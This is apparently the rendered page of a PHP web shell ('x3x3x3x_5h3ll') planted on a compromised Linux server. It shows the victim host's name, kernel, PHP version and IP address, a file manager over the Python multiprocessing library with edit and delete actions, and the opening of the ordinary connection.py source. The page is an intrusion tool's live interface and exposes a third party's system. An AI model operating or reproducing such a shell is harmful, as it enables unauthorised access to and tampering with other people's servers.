x3x3x3x_5h3ll
— 53cur3 — 5h3ll_1d —
Linux vps-10654784.cedaps.org.br 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
  INFO SERVER : Apache PHP : 7.4.33
/lib64/python3.6/multiprocessing/
162.240.100.168

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACTN ]
+FILE +DIR
__pycache__ dir drwxr-xr-x 2024-10-07 16:37 R D
dummy dir drwxr-xr-x 2024-10-07 16:37 R D
__init__.py 0.901 KB -rw-r--r-- 2018-12-23 21:37 R E G D
connection.py 30.334 KB -rw-r--r-- 2024-09-24 13:48 R E G D
context.py 10.661 KB -rw-r--r-- 2018-12-23 21:37 R E G D
forkserver.py 8.49 KB -rw-r--r-- 2018-12-23 21:37 R E G D
heap.py 8.124 KB -rw-r--r-- 2018-12-23 21:37 R E G D
managers.py 37.257 KB -rw-r--r-- 2018-12-23 21:37 R E G D
pool.py 25.448 KB -rw-r--r-- 2018-12-23 21:37 R E G D
popen_fork.py 2.253 KB -rw-r--r-- 2018-12-23 21:37 R E G D
popen_forkserver.py 1.91 KB -rw-r--r-- 2018-12-23 21:37 R E G D
popen_spawn_posix.py 1.859 KB -rw-r--r-- 2018-12-23 21:37 R E G D
popen_spawn_win32.py 2.929 KB -rw-r--r-- 2018-12-23 21:37 R E G D
process.py 8.995 KB -rw-r--r-- 2018-12-23 21:37 R E G D
queues.py 10.511 KB -rw-r--r-- 2018-12-23 21:37 R E G D
reduction.py 9.01 KB -rw-r--r-- 2018-12-23 21:37 R E G D
resource_sharer.py 5.2 KB -rw-r--r-- 2018-12-23 21:37 R E G D
semaphore_tracker.py 5.268 KB -rw-r--r-- 2018-12-23 21:37 R E G D
sharedctypes.py 6.099 KB -rw-r--r-- 2018-12-23 21:37 R E G D
spawn.py 8.655 KB -rw-r--r-- 2018-12-23 21:37 R E G D
synchronize.py 11.768 KB -rw-r--r-- 2018-12-23 21:37 R E G D
util.py 11.607 KB -rw-r--r-- 2018-12-23 21:37 R E G D
REQUEST EXIT
# # A higher level module for using sockets (or Windows named pipes) # # multiprocessing/connection.py # # Copyright (c) 2006-2008, R Oudkerk # Licensed to PSF under a Contributor Agreement. # __all__ = [ 'Client', 'Listener', 'Pipe', 'wait' ] import io import os import sys import socket import struct import time import tempfile import itertools import _multiprocessing from . import util from . import AuthenticationError, BufferTooShort from .context import reduction _ForkingPickler = reduction.ForkingPickler try: import _winapi from _winapi import WAIT_OBJECT_0, WAIT_ABANDONED_0, WAIT_TIMEOUT, INFINITE except ImportError: if sys.platform == 'win32': raise _winapi = None # # # BUFSIZE = 8192 # A very generous timeout when it comes to local connections... CONNECTION_TIMEOUT = 20. # The hmac module implicitly defaults to using MD5. # Support using a stronger algorithm for the challenge/response code: HMAC_DIGEST_NAME='sha256' _mmap_counter = itertools.count() default_family = 'AF_INET' families = ['AF_INET'] if hasattr(socket, 'AF_UNIX'): default_family = 'AF_UNIX' families += ['AF_UNIX'] if sys.platform == 'win32': default_family = 'AF_PIPE' families += ['AF_PIPE'] def _init_timeout(timeout=CONNECTION_TIMEOUT): return time.monotonic() + timeout def _check_timeout(t): return time.monotonic() > t # # # def arbitrary_address(family): ''' Return an arbitrary free address for the given family '''